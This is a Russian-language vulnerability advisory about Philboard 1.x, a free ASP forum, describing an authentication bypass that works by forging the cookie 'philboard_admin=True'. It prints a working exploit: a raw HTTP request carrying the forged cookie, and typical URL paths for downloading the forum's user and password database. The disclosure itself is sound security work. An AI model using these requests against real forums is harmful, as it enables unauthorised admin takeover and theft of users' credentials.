Удаленный административный доступ в Philboard

Дата публикации:02.06.2003
Дата изменения:02.07.2008
Всего просмотров:1074
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Philboard 1.x
Описание: Уязвимость обнаружена в бесплатном ASP форуме Philboard. Удаленный пользователь может получить административные привилегии на системе.

Сообщается, что удаленный пользователь может установить куки форума к "philboard_admin=True;" или "admin=True;", чтобы получить привилегии администратора на системе. Эксплоит:

1) Login Administrator Forum:
Use your telnet and open target on port 80

GET /board/philboard_admin.asp HTTP/1.0
Host: target.com
Cookie: philboard_admin=True;

2) Download the database (users and password):
Usually, the database location can be found and download it from:
http://www.target.com/database/philboard.mdb
or
http://www.target.com/forum/database/philboard.mdb
Уязвимость обнаружена в Philboard up to v1.14
Ссылки: Philboard Forum Vulnerability